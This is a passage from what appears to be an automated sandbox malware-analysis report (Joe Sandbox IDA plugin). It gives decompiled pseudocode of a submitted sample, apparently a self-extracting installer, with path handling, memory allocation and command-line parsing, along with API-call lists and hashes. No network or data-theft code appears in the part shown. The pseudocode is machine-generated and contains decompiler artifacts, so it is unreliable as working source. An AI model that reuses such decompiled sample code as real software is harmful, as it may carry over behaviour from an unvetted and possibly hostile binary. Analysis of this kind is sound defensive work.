                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                    • Opcode ID: f76d90a00e9944861b86dceeddbabecd33a654e666aee2be027160746755444e
                                                                                                                                                                                                    • Instruction ID: f842a4425994ac88c426dc0629865bfbcb0743efd411e3041981ebb8eac3a3d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f76d90a00e9944861b86dceeddbabecd33a654e666aee2be027160746755444e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36016931200205ABDB178F69DC45FA6776DAB85725F06822AE9799A1E0CB72D812CB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0039658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				char* _t16;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = __ecx;
                                                                                                                                                                                                    				_t10 = __edx;
                                                                                                                                                                                                    				_t17 = __ecx;
                                                                                                                                                                                                    				_t1 = _t17 + 1; // 0x398b3f
                                                                                                                                                                                                    				_t12 = _t1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t4 =  *_t17;
                                                                                                                                                                                                    					_t17 = _t17 + 1;
                                                                                                                                                                                                    				} while (_t4 != 0);
                                                                                                                                                                                                    				_t18 = _t17 - _t12;
                                                                                                                                                                                                    				_t2 = _t18 + 1; // 0x398b40
                                                                                                                                                                                                    				if(_t2 < __edx) {
                                                                                                                                                                                                    					_t19 = _t18 + __ecx;
                                                                                                                                                                                                    					if(_t19 > __ecx) {
                                                                                                                                                                                                    						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                    						if( *_t8 != 0x5c) {
                                                                                                                                                                                                    							 *_t19 = 0x5c;
                                                                                                                                                                                                    							_t19 =  &(_t19[1]);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t6 = _a4;
                                                                                                                                                                                                    					 *_t19 = 0;
                                                                                                                                                                                                    					while( *_t6 == 0x20) {
                                                                                                                                                                                                    						_t6 = _t6 + 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return E003916B3(_t16, _t10, _t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0x8007007a;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00396592
                                                                                                                                                                                                    0x00396594
                                                                                                                                                                                                    0x00396596
                                                                                                                                                                                                    0x00396598
                                                                                                                                                                                                    0x00396598
                                                                                                                                                                                                    0x0039659b
                                                                                                                                                                                                    0x0039659b
                                                                                                                                                                                                    0x0039659d
                                                                                                                                                                                                    0x0039659e
                                                                                                                                                                                                    0x003965a2
                                                                                                                                                                                                    0x003965a4
                                                                                                                                                                                                    0x003965a9
                                                                                                                                                                                                    0x003965b2
                                                                                                                                                                                                    0x003965b6
                                                                                                                                                                                                    0x003965ba
                                                                                                                                                                                                    0x003965c3
                                                                                                                                                                                                    0x003965c5
                                                                                                                                                                                                    0x003965c8
                                                                                                                                                                                                    0x003965c8
                                                                                                                                                                                                    0x003965c3
                                                                                                                                                                                                    0x003965c9
                                                                                                                                                                                                    0x003965cc
                                                                                                                                                                                                    0x003965d2
                                                                                                                                                                                                    0x003965d1
                                                                                                                                                                                                    0x003965d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003965dc
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(00398B3E,00398B3F,00000001,00398B3E,-00000003,?,003960EC,00391140,?), ref: 003965BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                    • Opcode ID: 592fd3a1e6895682e3741f178787694700a6e9db2ee6e5466b6ae8338387b8c9
                                                                                                                                                                                                    • Instruction ID: d2de2a47a602a6b3ec8d4cdd79ff5f94f54711aa1c9dedf6d5dbdd0c91fb4ef1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 592fd3a1e6895682e3741f178787694700a6e9db2ee6e5466b6ae8338387b8c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F04C336052519BDB33091D9884B67BFDE9B87350F2B016FE8DEC3209CA658C45C3A4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0039621E() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					0x4f0 = 2;
                                                                                                                                                                                                    					_t9 = E0039597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E003944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					_t9 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00396229
                                                                                                                                                                                                    0x00396230
                                                                                                                                                                                                    0x00396247
                                                                                                                                                                                                    0x0039626a
                                                                                                                                                                                                    0x00396272
                                                                                                                                                                                                    0x00396249
                                                                                                                                                                                                    0x00396255
                                                                                                                                                                                                    0x0039625f
                                                                                                                                                                                                    0x00396264
                                                                                                                                                                                                    0x00396264
                                                                                                                                                                                                    0x00396284

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0039623F
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                    • Opcode ID: 5f0ec019b70e1dc91b2d2b216ea8f9e99e3e1e1f1511cce95a2ceffd033f5ca4
                                                                                                                                                                                                    • Instruction ID: f858646e62406ffee7d28c0e60c9121f0e6dd75ae3d37017bb4228e1f92b42f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f0ec019b70e1dc91b2d2b216ea8f9e99e3e1e1f1511cce95a2ceffd033f5ca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF0BEB0604208ABEF52EB788D03FBE32BCDB84300F40046AB986DA181EE759D848690
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00394B60(signed int _a4) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 = _a4 * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 0x398d64)) != 1) {
                                                                                                                                                                                                    					_t9 = FindCloseChangeNotification( *(_t15 + 0x398d74)); // executed
                                                                                                                                                                                                    					if(_t9 == 0) {
                                                                                                                                                                                                    						return _t9 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *((intOrPtr*)(_t15 + 0x398d60)) = 1;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x398d60)) = 1;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x398d68)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x398d70)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x398d6c)) = 0;
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00394b66
                                                                                                                                                                                                    0x00394b74
                                                                                                                                                                                                    0x00394b98
                                                                                                                                                                                                    0x00394ba0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394bac
                                                                                                                                                                                                    0x00394ba4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394ba4
                                                                                                                                                                                                    0x00394b78
                                                                                                                                                                                                    0x00394b7e
                                                                                                                                                                                                    0x00394b84
                                                                                                                                                                                                    0x00394b8a
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00394FA1,00000000), ref: 00394B98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: ab8ff7552592e40440fe17ab0845933f933e724428e367d3f240c68c37de5c82
                                                                                                                                                                                                    • Instruction ID: 519a3f15b12e533783fe87ab565d32ad0eb479a7734f7c0de25780bb2d9747b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab8ff7552592e40440fe17ab0845933f933e724428e367d3f240c68c37de5c82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F01271500B089E5B73AF3DCC11A52BBE8AAD6360310092EA5AED2190DB31A84BCBD0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003966AE(CHAR* __ecx) {
                                                                                                                                                                                                    				unsigned int _t1;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                    					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x003966b1
                                                                                                                                                                                                    0x003966ba
                                                                                                                                                                                                    0x003966c7
                                                                                                                                                                                                    0x003966bc
                                                                                                                                                                                                    0x003966be
                                                                                                                                                                                                    0x003966be

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00394777,?,00394E38,?), ref: 003966B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                    • Opcode ID: 5bc2ceed80b135627d2a9e487361faeb9716eec6ffc49e738803cdff4b97f590
                                                                                                                                                                                                    • Instruction ID: 4396de8264f7613f38ad510c09ceef0bcef33e8be9506d132684624b9dc34ab6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bc2ceed80b135627d2a9e487361faeb9716eec6ffc49e738803cdff4b97f590
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BB09276626841426E2206396C2A5562845A6C133ABE51B95F032C02E0CA3EC856D044
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00394CA0(long _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00394caa
                                                                                                                                                                                                    0x00394cb1

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00394CAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                    • Opcode ID: 2eec1409b953ae60451214f243766169e61138718ecd7d6d0ae0ffff73930543
                                                                                                                                                                                                    • Instruction ID: a4e7ace4f0d5b3cdca7cae13a419faa75435f3bfac76305c43d23b7edc4e8510
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eec1409b953ae60451214f243766169e61138718ecd7d6d0ae0ffff73930543
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9B0123204420CB7CF011FC6EC09F853F1DE7C4761F140001F60C451508A73942086D6
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00394CC0(void* _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00394cc8
                                                                                                                                                                                                    0x00394ccf

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                    • Opcode ID: 8a87d90f8e68596caa144668fb7e1102b2f443ab98e407a2bf013e3bc01f9c23
                                                                                                                                                                                                    • Instruction ID: 52008d38d2d1a643fb3b8c0bf75aa31be11740acf76300cbba486b4c1d20c929
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a87d90f8e68596caa144668fb7e1102b2f443ab98e407a2bf013e3bc01f9c23
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B0123100010CB78F011B46EC088453F1DD6C0360B000011F50C411218B33981185C5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00395C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				CHAR* _v265;
                                                                                                                                                                                                    				char _v266;
                                                                                                                                                                                                    				char _v267;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				CHAR* _v272;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				CHAR* _t69;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				char _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                    				CHAR* _t144;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                    				char _t155;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                    				char _t167;
                                                                                                                                                                                                    				char _t170;
                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                                                                                    				CHAR* _t199;
                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                    				CHAR* _t201;
                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                    				int _t209;
                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                    				CHAR* _t218;
                                                                                                                                                                                                    				intOrPtr* _t219;
                                                                                                                                                                                                    				intOrPtr* _t220;
                                                                                                                                                                                                    				signed int _t221;
                                                                                                                                                                                                    				signed int _t223;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t173 = __ecx;
                                                                                                                                                                                                    				_t61 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_t209 = 1;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					while(_t209 != 0) {
                                                                                                                                                                                                    						_t67 =  *_t173;
                                                                                                                                                                                                    						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                    							_t173 = CharNextA(_t173);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v272 = _t173;
                                                                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                    							_t163 = 0;
                                                                                                                                                                                                    							_t202 = 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								if(_t213 != 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t69 =  *_t69;
                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00396CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00396E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E0039597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E003944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0x399124 = E00396285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00396CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                    												E003944B9(0, 0x521, 0x391140, 0, 0x40, 0);
                                                                                                                                                                                                    												_t85 =  *0x398588; // 0x0
                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
